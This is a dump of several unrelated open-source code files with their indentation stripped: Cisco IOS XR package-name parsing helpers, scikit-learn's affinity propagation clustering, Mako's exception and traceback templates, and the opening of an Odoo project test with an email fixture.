r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<ARCH>p\w+)\.(?P<PKGFORMAT>\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\d+)')
pkg_expr_inact = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<ARCH>p\w+)(?P<PKGFORMAT>-)(?P<VERSION>\d+\.\d+\.\d+)')
pkg_expr_inact_eng_noarc=re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)(?P<PKGFORMAT>-)(?P<VERSION>\d+\.\d+\.\d+\.\d+\w+)')
pkg_expr_2pkg_inac = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)-(?P<ARCH>p\w+)(?P<PKGFORMAT>-)(?P<VERSION>\d+\.\d+\.\d+)')
smu_expr_eng_int = re.compile(
r'(?P<PLATFORM>\w+)-(?P<ARCH>p\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\d+.)\.(?P<PKGNAME>CSC\w+)(?P<PKGFORMAT>-)(?P<SMUVERSION>\d+\.\d+\.\d+.*)')
smu_expr_eng_int1 = re.compile(
r'(?P<PLATFORM>\w+)-(?P<ARCH>p\w+)-(?P<VERSION>\d+\.\d+\.\d+)\.(?P<PKGNAME>CSC\w+)(?P<PKGFORMAT>-)(?P<SMUVERSION>.*)')
smu_expr = re.compile(
r'(?P<PLATFORM>\w+)-(?P<ARCH>\w+)-(?P<VERSION>\d+\.\d+\.\d+)\.(?P<PKGNAME>\w+)\.(?P<PKGFORMAT>\w+)')
smu_expr2 = re.compile(
r'(?P<PLATFORM>\w+)-(?P<ARCH>\w+)-(?P<VERSION>\d+\.\d+\.\d+)\.(?P<PKGNAME>\w+)-(?P<SMUVERSION>\d+\.\d+\.\d+)\.(?P<PKGFORMAT>\w+)')
smu_expr3 = re.compile(
r'(?P<PLATFORM>\w+)-(?P<ARCH>\w+)-(?P<VERSION>\d+\.\d+\.\d+)\.(?P<PKGNAME>\w+)-(?P<PKGFORMAT>\d+\.\d+\.\d+)')
pkg_expr_2pkg_int = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)-(?P<ARCH>p\w+)\.(?P<PKGFORMAT>\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\d+[a-zA-Z])')
pkg_expr_int = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<ARCH>p\w+)\.(?P<PKGFORMAT>\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\d+[a-zA-Z])')
smu_expr_int = re.compile(
r'(?P<PLATFORM>\w+)-(?P<ARCH>\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\w*)\.(?P<PKGNAME>\w+)\.(?P<PKGFORMAT>\w+)')
smu_expr2_int = re.compile(
r'(?P<PLATFORM>\w+)-(?P<ARCH>\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\w*)\.(?P<PKGNAME>\w+)-(?P<SMUVERSION>\d+\.\d+\.\d+\.\w*)\.(?P<PKGFORMAT>\w+)')
pkg_expr_2pkg_eng = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<ARCH>p\w+)(?P<PKGFORMAT>-)(?P<VERSION>\d+\.\d+\.\d+\.\w+)')
pkg_expr_2pkg_eng_test = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+-\w+)-(?P<ARCH>p\w+)(?P<PKGFORMAT>-)(?P<VERSION>\d+\.\d+\.\d+\.\w+)')
pkg_expr_2pkg_sp = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+-\w+)(?P<PKGFORMAT>-)(?P<VERSION>\d+\.\d+\.\d+\.\w+-\d+\.\d+\.\d+)')
pkg_expr_2pkg_sp1 = re.compile(
r'(?P<PLATFORM>\w+)(?P<PKGNAME>-)(?P<ARCH>p\w+)(?P<PKGFORMAT>-)(?P<VERSION>\d+\.\d+\.\d+\.\w+-\d+\.\d+\.\d+)')
pkg_arch="1"
smu_ver="0"
pkgobj = PackageClass(pkg)
p = pkg_expr_2pkg_eng1.search(pkg)
if not p:
p = pkg_expr_2pkg.search(pkg)
if not p:
p = pkg_expr_2pkg_eng_test.search(pkg)
if not p:
p = pkg_expr_2pkg_sp.search(pkg)
if not p:
p = pkg_expr_2pkg_eng.search(pkg)
if not p:
p = pkg_expr_2pkg_int.search(pkg)
if not p:
p = pkg_expr_int.search(pkg)
if not p:
p = smu_expr2_int.search(pkg)
if not p:
p = pkg_expr_2pkg_inac.search(pkg)
if not p:
p = smu_expr_int.search(pkg)
if not p:
p = pkg_expr.search(pkg)
if not p:
p = smu_expr_eng_int.search(pkg)
smu_ver="1"
if not p:
p = smu_expr_eng_int1.search(pkg)
smu_ver="1"
if not p:
p = smu_expr.search(pkg)
smu_ver=0
if not p:
p = smu_expr3.search(pkg)
smu_ver=0
if not p:
p = smu_expr2.search(pkg)
smu_ver=0
if not p:
p = pkg_expr_inact.search(pkg)
smu_ver=0
if not p:
p = pkg_expr_inact_eng_noarc.search(pkg)
pkg_arch="0"
smu_ver=0
if not p:
            p = pkg_expr_2pkg_inac_noarch.search(pkg)
pkg_arch="0"
smu_ver=0
if p:
if p.group("PKGFORMAT") == PIE or p.group("PKGFORMAT")== "-" or p.group("PKGFORMAT") == "1.0.0" or p.group("PKGFORMAT") == ".":
pkgobj.platform = p.group("PLATFORM")
if "SUBPKGNAME" in p.groupdict().keys():
if p.group("PKGNAME")[:8] == 'asr9000v':
packagename = p.group(
"PKGNAME")[3:] + "-" + p.group("SUBPKGNAME")
else:
packagename = p.group(
"PKGNAME") + "-" + p.group("SUBPKGNAME")
else:
packagename = p.group("PKGNAME")
pkgobj.pkg = packagename
if pkg_arch=="0":
pkgobj.arch=""
else:
if p.group("PKGFORMAT") == PIE and packagename == "services-infra":
pkgobj.arch=""
else:
pkgobj.arch = p.group("ARCH")
if p.group("PKGFORMAT") == ".":
pkgobj.format = p.group("PKGFORMAT")+p.group("PKGSUBFORMAT")
else:
pkgobj.format = p.group("PKGFORMAT")
if smu_ver=="1":
pkgobj.format = p.group("SMUVERSION")
pkgobj.version = p.group("VERSION")
return pkgobj
def validate_xrrpm_pkg(self, pkg):
pass
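# Illustrative parse (expected attribute values inferred from the regexes
# above, not exhaustive):
#
#   pkg = NewPackage().validate_offbox_xrpie_pkg('asr9k-mgbl-px.pie-4.2.3')
#   # pkg.platform == 'asr9k', pkg.pkg == 'mgbl', pkg.arch == 'px',
#   # pkg.format == 'pie', pkg.version == '4.2.3'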
class OnboxPackage():
def __init__(self, pkg_lst_file=None, pkg_state=None):
self.inputfile = None
self.pkg_list = []
self.pkg_state = pkg_state
if pkg_lst_file:
self.inputfile = pkg_lst_file
self.update_pkgs()
def update_pkgs(self):
if os.path.exists(self.inputfile):
data = get_pkgs(self.inputfile)
else:
data = self.inputfile.split("\n")
start_pkg = False
if data:
for line in data:
if line.find(self.pkg_state) < 0 and not start_pkg:
continue
elif not start_pkg:
start_pkg = True
pkg_name = line.strip()
pkg = self.validate_xrpie_pkg(pkg_name)
if not pkg:
pkg = self.validate_xrrpm_pkg(pkg_name)
if pkg:
self.pkg_list.append(pkg)
def validate_xrpie_pkg(self, pkg):
# disk0:asr9k-mini-px-4.3.2
# asr9k-px-4.2.3.CSCue60194-1.0.0
# disk0:asr9k-px-5.3.1.06I.CSCub11122-1.0.0
#self.error("package",pkg)
pkg_expr_2pkg = re.compile(
r'(?P<DISK>\w+):(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)-(?P<ARCH>p\w+)-(?P<VERSION>\d+\.\d+\.\d+.*)')
pkg_expr_2pkg_eng = re.compile(
r'(?P<DISK>\w+):(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)-(?P<ARCH>p\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\d+\w+)')
pkg_expr_2pkg_inac = re.compile(
r'(?P<DISK>\w+):(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)-(?P<ARCH>p\w+)-(?P<VERSION>\d+\.\d+\.\d+)')
pkg_expr = re.compile(
r'(?P<DISK>\w+):(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<ARCH>p\w+)-(?P<VERSION>\d+\.\d+\.\d+)')
pkg_expr_eng = re.compile(
r'(?P<DISK>\w+):(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<ARCH>p\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\d+\w+)')
smu_expr = re.compile(
r'(?P<DISK>\w+):(?P<PLATFORM>\w+)-(?P<ARCH>p\w+)-(?P<VERSION>\d+\.\d+\.\d+)\.(?P<PKGNAME>\w+)-(?P<SUBVERSION>\d+\.\d+\.\d+)')
pkg_expr_int = re.compile(
r'(?P<DISK>\w+):(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<ARCH>p\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\d+[a-zA-Z])')
smu_expr_int = re.compile(
r'(?P<DISK>\w+):(?P<PLATFORM>\w+)-(?P<ARCH>p\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\w*)\.(?P<PKGNAME>\w+)-(?P<SUBVERSION>\d+\.\d+\.\d+.\w*)')
smu_expr_internal = re.compile(
r'(?P<DISK>\w+):(?P<PLATFORM>\w+)-(?P<ARCH>p\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\w*)\.(?P<PKGNAME>\w+)-(?P<SUBVERSION>\d+\.\d+\.\d+)')
pkg_expr_noarch = re.compile(
r'(?P<DISK>\w+):(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)-(?P<VERSION>\d+\.\d+\.\d+)')
pkg_expr_noarch_eng = re.compile(
r'(?P<DISK>\w+):(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\d+\w+)')
pkgobj = PackageClass()
p = pkg_expr_2pkg_eng.search(pkg)
if not p:
p = pkg_expr_2pkg.search(pkg)
if not p:
p = pkg_expr_int.search(pkg)
if not p:
p = smu_expr_int.search(pkg)
if not p:
p = pkg_expr_eng.search(pkg)
if not p:
p = pkg_expr.search(pkg)
if not p:
p = smu_expr.search(pkg)
if not p:
p = smu_expr_internal.search(pkg)
if not p:
p = pkg_expr_noarch_eng.search(pkg)
if not p:
p = pkg_expr_noarch.search(pkg)
if p:
pkgobj.platform = p.group("PLATFORM")
if "SUBPKGNAME" in p.groupdict().keys():
packagename = p.group("PKGNAME") + "-" + p.group("SUBPKGNAME")
else:
packagename = p.group("PKGNAME")
pkgobj.pkg = packagename
pkgobj.partition = p.group("DISK")
try:
pkgobj.arch = p.group("ARCH")
except:
pkgobj.arch = "px"
pkgobj.version = p.group("VERSION")
if "SUBVERSION" in p.groupdict().keys():
pkgobj.subversion = p.group("SUBVERSION")
return pkgobj
def validate_xrrpm_pkg(self, pkg):
pass
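# Illustrative parse (expected attribute values inferred from the regexes
# above):
#
#   pkg = OnboxPackage().validate_xrpie_pkg('disk0:asr9k-mini-px-4.3.2')
#   # pkg.partition == 'disk0', pkg.pkg == 'mini', pkg.arch == 'px',
#   # pkg.version == '4.3.2'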
# FIXME: This needs to be implemented as sets
# Packages in list1 but not in list 2
def missing_pkgs(list1, list2):
missing_lst = []
for pk1 in list1:
missing = True
for pk2 in list2:
if pk1.pkg == pk2.pkg and pk1.version == pk2.version:
missing = False
if missing:
missing_lst.append(pk1)
return missing_lst
# Packages in list2 but not in list 1
def extra_pkgs(list1, list2):
extra_lst = []
for pk2 in list2:
extra = True
for pk1 in list1:
if pk1.pkg == pk2.pkg and pk1.version == pk2.version:
extra = False
if extra:
extra_lst.append(pk2)
return extra_lst
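# A set-based sketch of the same comparisons, as suggested by the FIXME
# above (assumes (pkg, version) uniquely identifies a package):
#
#   def missing_pkgs_set(list1, list2):
#       seen = set((p.pkg, p.version) for p in list2)
#       return [p for p in list1 if (p.pkg, p.version) not in seen]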
def package_intersection(new_packages, device_packages):
"""
Produces an intersection of new packages and device packages.
"""
SMU_RE = r'CSC\D\D\d\d\d'
FP_RE = r'fp\d+'
SP_RE = r'sp\d+'
packages = []
for pk1 in new_packages:
for pk2 in device_packages:
if pk1.pkg == pk2.pkg and pk1.version == pk2.version:
if re.match(SMU_RE, pk2.pkg) or re.match(FP_RE, pk2.pkg) or \
re.match(SP_RE, pk2.pkg):
                    # It's a SMU; its on-box format is
# disk0:asr9k-px-4.3.2.CSCuj61599-1.0.0
pkg = "%s:%s-%s-%s.%s-%s" % (
pk2.partition, pk2.platform, pk2.arch,
pk2.version, pk2.pkg, pk2.subversion
)
else:
if pk1.arch == "":
pkg = "%s:%s-%s-%s" % (
pk2.partition, pk2.platform, pk2.pkg,
pk2.version
)
else:
pkg = "%s:%s-%s-%s-%s" % (
pk2.partition, pk2.platform, pk2.pkg, pk2.arch,
pk2.version
)
packages.append(pkg)
return packages
def parse_xr_show_platform(output):
inventory = {}
lines = output.split('\n')
for line in lines:
line = line.strip()
if len(line) > 0 and line[0].isdigit():
node = line[:15].strip()
entry = {
'type': line[16:41].strip(),
'state': line[42:58].strip(),
'config_state': line[59:].strip()
}
inventory[node] = entry
return inventory
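# Illustrative 'show platform' line (column widths assumed from the string
# slices above; real IOS XR output may differ):
#
#   0/RSP0/CPU0     A9K-RSP440-SE(Active)     IOS XR RUN       PWR,NSHUT,MON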
def validate_xr_node_state(inventory, device):
valid_state = [
'IOS XR RUN',
'PRESENT',
'UNPOWERED',
'READY',
'UNPOWERED',
'FAILED',
'OK',
'ADMIN DOWN',
'DISABLED'
]
for key, value in inventory.items():
if 'CPU' in key:
if value['state'] not in valid_state:
break
else:
device.store_property('inventory', inventory)
return True
return False
protocols = ['tftp', 'ftp:', 'sftp']
def get_pkgs(pkg_lst):
if isinstance(pkg_lst, list):
return pkg_lst
elif isinstance(pkg_lst, str):
fd = open(pkg_lst, "r")
pkg_names = fd.readlines()
fd.close()
pkg_list = [x for x in [p.split("#")[0].strip() for p in pkg_names if p] if x[:4] not in protocols]
if pkg_list:
pkg_list = [p for p in pkg_list if p]
return pkg_list
def get_repo(pkg_lst_file):
fd = open(pkg_lst_file, "r")
pkg_names = fd.readlines()
fd.close()
repo = [x for x in [p.split("#")[0].strip()
for p in pkg_names if p] if x[:4] in protocols]
if repo:
repo = [p for p in repo if p]
return repo[-1]
| apache-2.0 |
moutai/scikit-learn | sklearn/cluster/affinity_propagation_.py | 60 | 10688 | """Affinity Propagation clustering algorithm."""
# Author: Alexandre Gramfort [email protected]
# Gael Varoquaux [email protected]
# License: BSD 3 clause
import numpy as np
from ..base import BaseEstimator, ClusterMixin
from ..utils import as_float_array, check_array
from ..utils.validation import check_is_fitted
from ..metrics import euclidean_distances
from ..metrics import pairwise_distances_argmin
def affinity_propagation(S, preference=None, convergence_iter=15, max_iter=200,
damping=0.5, copy=True, verbose=False,
return_n_iter=False):
"""Perform Affinity Propagation Clustering of data
Read more in the :ref:`User Guide <affinity_propagation>`.
Parameters
----------
S : array-like, shape (n_samples, n_samples)
Matrix of similarities between points
preference : array-like, shape (n_samples,) or float, optional
Preferences for each point - points with larger values of
preferences are more likely to be chosen as exemplars. The number of
exemplars, i.e. of clusters, is influenced by the input preferences
value. If the preferences are not passed as arguments, they will be
set to the median of the input similarities (resulting in a moderate
number of clusters). For a smaller amount of clusters, this can be set
to the minimum value of the similarities.
convergence_iter : int, optional, default: 15
Number of iterations with no change in the number
of estimated clusters that stops the convergence.
max_iter : int, optional, default: 200
Maximum number of iterations
damping : float, optional, default: 0.5
Damping factor between 0.5 and 1.
copy : boolean, optional, default: True
If copy is False, the affinity matrix is modified inplace by the
algorithm, for memory efficiency
verbose : boolean, optional, default: False
The verbosity level
return_n_iter : bool, default False
Whether or not to return the number of iterations.
Returns
-------
cluster_centers_indices : array, shape (n_clusters,)
index of clusters centers
labels : array, shape (n_samples,)
cluster labels for each point
n_iter : int
number of iterations run. Returned only if `return_n_iter` is
set to True.
Notes
-----
See examples/cluster/plot_affinity_propagation.py for an example.
References
----------
Brendan J. Frey and Delbert Dueck, "Clustering by Passing Messages
Between Data Points", Science Feb. 2007
"""
S = as_float_array(S, copy=copy)
n_samples = S.shape[0]
if S.shape[0] != S.shape[1]:
raise ValueError("S must be a square array (shape=%s)" % repr(S.shape))
if preference is None:
preference = np.median(S)
if damping < 0.5 or damping >= 1:
raise ValueError('damping must be >= 0.5 and < 1')
random_state = np.random.RandomState(0)
# Place preference on the diagonal of S
S.flat[::(n_samples + 1)] = preference
A = np.zeros((n_samples, n_samples))
R = np.zeros((n_samples, n_samples)) # Initialize messages
# Intermediate results
tmp = np.zeros((n_samples, n_samples))
# Remove degeneracies
S += ((np.finfo(np.double).eps * S + np.finfo(np.double).tiny * 100) *
random_state.randn(n_samples, n_samples))
# Execute parallel affinity propagation updates
e = np.zeros((n_samples, convergence_iter))
ind = np.arange(n_samples)
for it in range(max_iter):
# tmp = A + S; compute responsibilities
np.add(A, S, tmp)
I = np.argmax(tmp, axis=1)
Y = tmp[ind, I] # np.max(A + S, axis=1)
tmp[ind, I] = -np.inf
Y2 = np.max(tmp, axis=1)
# tmp = Rnew
np.subtract(S, Y[:, None], tmp)
tmp[ind, I] = S[ind, I] - Y2
# Damping
tmp *= 1 - damping
R *= damping
R += tmp
# tmp = Rp; compute availabilities
np.maximum(R, 0, tmp)
tmp.flat[::n_samples + 1] = R.flat[::n_samples + 1]
# tmp = -Anew
tmp -= np.sum(tmp, axis=0)
dA = np.diag(tmp).copy()
tmp.clip(0, np.inf, tmp)
tmp.flat[::n_samples + 1] = dA
# Damping
tmp *= 1 - damping
A *= damping
A -= tmp
# Check for convergence
E = (np.diag(A) + np.diag(R)) > 0
e[:, it % convergence_iter] = E
K = np.sum(E, axis=0)
if it >= convergence_iter:
se = np.sum(e, axis=1)
unconverged = (np.sum((se == convergence_iter) + (se == 0))
!= n_samples)
if (not unconverged and (K > 0)) or (it == max_iter):
if verbose:
print("Converged after %d iterations." % it)
break
else:
if verbose:
print("Did not converge")
I = np.where(np.diag(A + R) > 0)[0]
K = I.size # Identify exemplars
if K > 0:
c = np.argmax(S[:, I], axis=1)
c[I] = np.arange(K) # Identify clusters
# Refine the final set of exemplars and clusters and return results
for k in range(K):
ii = np.where(c == k)[0]
j = np.argmax(np.sum(S[ii[:, np.newaxis], ii], axis=0))
I[k] = ii[j]
c = np.argmax(S[:, I], axis=1)
c[I] = np.arange(K)
labels = I[c]
# Reduce labels to a sorted, gapless, list
cluster_centers_indices = np.unique(labels)
labels = np.searchsorted(cluster_centers_indices, labels)
else:
labels = np.empty((n_samples, 1))
cluster_centers_indices = None
labels.fill(np.nan)
if return_n_iter:
return cluster_centers_indices, labels, it + 1
else:
return cluster_centers_indices, labels
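# Minimal usage sketch for the functional interface (synthetic data; the
# preference value is illustrative):
#
#   X = np.array([[0., 0.], [1., 1.], [5., 5.]])
#   S = -euclidean_distances(X, squared=True)
#   centers_idx, labels = affinity_propagation(S, preference=-10)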
###############################################################################
class AffinityPropagation(BaseEstimator, ClusterMixin):
"""Perform Affinity Propagation Clustering of data.
Read more in the :ref:`User Guide <affinity_propagation>`.
Parameters
----------
damping : float, optional, default: 0.5
Damping factor between 0.5 and 1.
convergence_iter : int, optional, default: 15
Number of iterations with no change in the number
of estimated clusters that stops the convergence.
max_iter : int, optional, default: 200
Maximum number of iterations.
copy : boolean, optional, default: True
Make a copy of input data.
preference : array-like, shape (n_samples,) or float, optional
Preferences for each point - points with larger values of
preferences are more likely to be chosen as exemplars. The number
of exemplars, ie of clusters, is influenced by the input
preferences value. If the preferences are not passed as arguments,
they will be set to the median of the input similarities.
affinity : string, optional, default=``euclidean``
Which affinity to use. At the moment ``precomputed`` and
``euclidean`` are supported. ``euclidean`` uses the
negative squared euclidean distance between points.
verbose : boolean, optional, default: False
Whether to be verbose.
Attributes
----------
cluster_centers_indices_ : array, shape (n_clusters,)
Indices of cluster centers
cluster_centers_ : array, shape (n_clusters, n_features)
Cluster centers (if affinity != ``precomputed``).
labels_ : array, shape (n_samples,)
Labels of each point
affinity_matrix_ : array, shape (n_samples, n_samples)
Stores the affinity matrix used in ``fit``.
n_iter_ : int
Number of iterations taken to converge.
Notes
-----
See examples/cluster/plot_affinity_propagation.py for an example.
The algorithmic complexity of affinity propagation is quadratic
in the number of points.
References
----------
Brendan J. Frey and Delbert Dueck, "Clustering by Passing Messages
Between Data Points", Science Feb. 2007
"""
def __init__(self, damping=.5, max_iter=200, convergence_iter=15,
copy=True, preference=None, affinity='euclidean',
verbose=False):
self.damping = damping
self.max_iter = max_iter
self.convergence_iter = convergence_iter
self.copy = copy
self.verbose = verbose
self.preference = preference
self.affinity = affinity
@property
def _pairwise(self):
return self.affinity == "precomputed"
def fit(self, X, y=None):
""" Create affinity matrix from negative euclidean distances, then
apply affinity propagation clustering.
Parameters
----------
X: array-like, shape (n_samples, n_features) or (n_samples, n_samples)
Data matrix or, if affinity is ``precomputed``, matrix of
similarities / affinities.
"""
X = check_array(X, accept_sparse='csr')
if self.affinity == "precomputed":
self.affinity_matrix_ = X
elif self.affinity == "euclidean":
self.affinity_matrix_ = -euclidean_distances(X, squared=True)
else:
raise ValueError("Affinity must be 'precomputed' or "
"'euclidean'. Got %s instead"
% str(self.affinity))
self.cluster_centers_indices_, self.labels_, self.n_iter_ = \
affinity_propagation(
self.affinity_matrix_, self.preference, max_iter=self.max_iter,
convergence_iter=self.convergence_iter, damping=self.damping,
copy=self.copy, verbose=self.verbose, return_n_iter=True)
if self.affinity != "precomputed":
self.cluster_centers_ = X[self.cluster_centers_indices_].copy()
return self
def predict(self, X):
"""Predict the closest cluster each sample in X belongs to.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
New data to predict.
Returns
-------
labels : array, shape (n_samples,)
Index of the cluster each sample belongs to.
"""
check_is_fitted(self, "cluster_centers_indices_")
if not hasattr(self, "cluster_centers_"):
raise ValueError("Predict method is not supported when "
"affinity='precomputed'.")
return pairwise_distances_argmin(X, self.cluster_centers_)
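# Minimal usage sketch (synthetic data; the preference value is
# illustrative):
#
#   import numpy as np
#   X = np.array([[1, 2], [1, 4], [1, 0], [4, 2], [4, 4], [4, 0]])
#   af = AffinityPropagation(preference=-50).fit(X)
#   af.labels_            # cluster label for each sample
#   af.cluster_centers_   # exemplar coordinates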
| bsd-3-clause |
gdubost1/shaderman | mako/exceptions.py | 5 | 9031 | # exceptions.py
# Copyright (C) 2006, 2007 Michael Bayer [email protected]
#
# This module is part of Mako and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""exception classes"""
import traceback, sys, re
class MakoException(Exception):
pass
class RuntimeException(MakoException):
pass
def _format_filepos(lineno, pos, filename):
if filename is None:
return " at line: %d char: %d" % (lineno, pos)
else:
return " in file '%s' at line: %d char: %d" % (filename, lineno, pos)
class CompileException(MakoException):
def __init__(self, message, source, lineno, pos, filename):
MakoException.__init__(self, message + _format_filepos(lineno, pos, filename))
        self.lineno = lineno
self.pos = pos
self.filename = filename
self.source = source
class SyntaxException(MakoException):
def __init__(self, message, source, lineno, pos, filename):
MakoException.__init__(self, message + _format_filepos(lineno, pos, filename))
        self.lineno = lineno
self.pos = pos
self.filename = filename
self.source = source
class TemplateLookupException(MakoException):
pass
class TopLevelLookupException(TemplateLookupException):
pass
class RichTraceback(object):
"""pulls the current exception from the sys traceback and extracts Mako-specific
template information.
Usage:
RichTraceback()
Properties:
error - the exception instance.
    source - source code of the file where the error occurred. if the error occurred within a compiled template,
this is the template source.
    lineno - line number where the error occurred. if the error occurred within a compiled template, the line number
is adjusted to that of the template source
records - a list of 8-tuples containing the original python traceback elements, plus the
filename, line number, source line, and full template source for the traceline mapped back to its originating source
template, if any for that traceline (else the fields are None).
reverse_records - the list of records in reverse
traceback - a list of 4-tuples, in the same format as a regular python traceback, with template-corresponding
traceback records replacing the originals
reverse_traceback - the traceback list in reverse
"""
def __init__(self):
(self.source, self.lineno) = ("", 0)
(t, self.error, self.records) = self._init()
if self.error is None:
self.error = t
if isinstance(self.error, CompileException) or isinstance(self.error, SyntaxException):
import mako.template
self.source = self.error.source
self.lineno = self.error.lineno
self._has_source = True
self.reverse_records = [r for r in self.records]
self.reverse_records.reverse()
def _get_reformatted_records(self, records):
for rec in records:
if rec[6] is not None:
yield (rec[4], rec[5], rec[2], rec[6])
else:
yield tuple(rec[0:4])
traceback = property(lambda self:self._get_reformatted_records(self.records), doc="""
return a list of 4-tuple traceback records (i.e. normal python format)
with template-corresponding lines remapped to the originating template
""")
reverse_traceback = property(lambda self:self._get_reformatted_records(self.reverse_records), doc="""
return the same data as traceback, except in reverse order
""")
def _init(self):
"""format a traceback from sys.exc_info() into 7-item tuples, containing
the regular four traceback tuple items, plus the original template
filename, the line number adjusted relative to the template source, and
code line from that line number of the template."""
import mako.template
mods = {}
(type, value, trcback) = sys.exc_info()
rawrecords = traceback.extract_tb(trcback)
new_trcback = []
for filename, lineno, function, line in rawrecords:
try:
(line_map, template_lines) = mods[filename]
except KeyError:
try:
info = mako.template._get_module_info(filename)
module_source = info.code
template_source = info.source
template_filename = info.template_filename or filename
except KeyError:
new_trcback.append((filename, lineno, function, line, None, None, None, None))
continue
template_ln = module_ln = 1
line_map = {}
for line in module_source.split("\n"):
match = re.match(r'\s*# SOURCE LINE (\d+)', line)
if match:
template_ln = int(match.group(1))
else:
template_ln += 1
module_ln += 1
line_map[module_ln] = template_ln
template_lines = [line for line in template_source.split("\n")]
mods[filename] = (line_map, template_lines)
template_ln = line_map[lineno]
if template_ln <= len(template_lines):
template_line = template_lines[template_ln - 1]
else:
template_line = None
new_trcback.append((filename, lineno, function, line, template_filename, template_ln, template_line, template_source))
if not self.source:
for l in range(len(new_trcback)-1, 0, -1):
if new_trcback[l][5]:
self.source = new_trcback[l][7]
self.lineno = new_trcback[l][5]
break
else:
self.source = file(new_trcback[-1][0]).read()
self.lineno = new_trcback[-1][1]
return (type, value, new_trcback)
def text_error_template(lookup=None):
"""provides a template that renders a stack trace in a similar format to the Python interpreter,
substituting source template filenames, line numbers and code for that of the originating
source template, as applicable."""
import mako.template
return mako.template.Template(r"""
<%!
from mako.exceptions import RichTraceback
%>\
<%
tback = RichTraceback()
%>\
Traceback (most recent call last):
% for (filename, lineno, function, line) in tback.traceback:
File "${filename}", line ${lineno}, in ${function or '?'}
${line | unicode.strip}
% endfor
${str(tback.error.__class__.__name__)}: ${str(tback.error)}
""")
def html_error_template():
"""provides a template that renders a stack trace in an HTML format, providing an excerpt of
code as well as substituting source template filenames, line numbers and code
for that of the originating source template, as applicable.
the template's default encoding_errors value is 'htmlentityreplace'. the template has
two options:
with the full option disabled, only a section of an HTML document is returned.
with the css option disabled, the default stylesheet won't be included."""
import mako.template
return mako.template.Template(r"""
<%!
from mako.exceptions import RichTraceback
%>
<%page args="full=True, css=True"/>
% if full:
<html>
<head>
<title>Mako Runtime Error</title>
% endif
% if css:
<style>
body { font-family:verdana; margin:10px 30px 10px 30px;}
.stacktrace { margin:5px 5px 5px 5px; }
.highlight { padding:0px 10px 0px 10px; background-color:#9F9FDF; }
.nonhighlight { padding:0px; background-color:#DFDFDF; }
.sample { padding:10px; margin:10px 10px 10px 10px; font-family:monospace; }
.sampleline { padding:0px 10px 0px 10px; }
.sourceline { margin:5px 5px 10px 5px; font-family:monospace;}
.location { font-size:80%; }
</style>
% endif
% if full:
</head>
<body>
% endif
<h2>Error !</h2>
<%
tback = RichTraceback()
src = tback.source
line = tback.lineno
if src:
lines = src.split('\n')
else:
lines = None
%>
<h3>${str(tback.error.__class__.__name__)}: ${str(tback.error)}</h3>
% if lines:
<div class="sample">
<div class="nonhighlight">
% for index in range(max(0, line-4),min(len(lines), line+5)):
% if index + 1 == line:
<div class="highlight">${index + 1} ${lines[index] | h}</div>
% else:
<div class="sampleline">${index + 1} ${lines[index] | h}</div>
% endif
% endfor
</div>
</div>
% endif
<div class="stacktrace">
% for (filename, lineno, function, line) in tback.reverse_traceback:
<div class="location">${filename}, line ${lineno}:</div>
<div class="sourceline">${line | h}</div>
% endfor
</div>
% if full:
</body>
</html>
% endif
""", output_encoding=sys.getdefaultencoding(), encoding_errors='htmlentityreplace')
| bsd-3-clause |
apanju/GMIO_Odoo | addons/project/tests/test_project_flow.py | 198 | 8762 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (c) 2013-TODAY OpenERP S.A. <http://www.openerp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from .test_project_base import TestProjectBase
from openerp.exceptions import AccessError
from openerp.tools import mute_logger
EMAIL_TPL = """Return-Path: <[email protected]>
X-Original-To: {email_to}
Delivered-To: {email_to}
To: {email_to}
Received: by mail1.openerp.com (Postfix, from userid 10002)
id 5DF9ABFB2A; Fri, 10 Aug 2012 16:16:39 +0200 (CEST)
Message-ID: {msg_id}
Date: Tue, 29 Nov 2011 12:43:21 +0530
From: {email_from}
MIME-Version: 1.0
Subject: {subject}
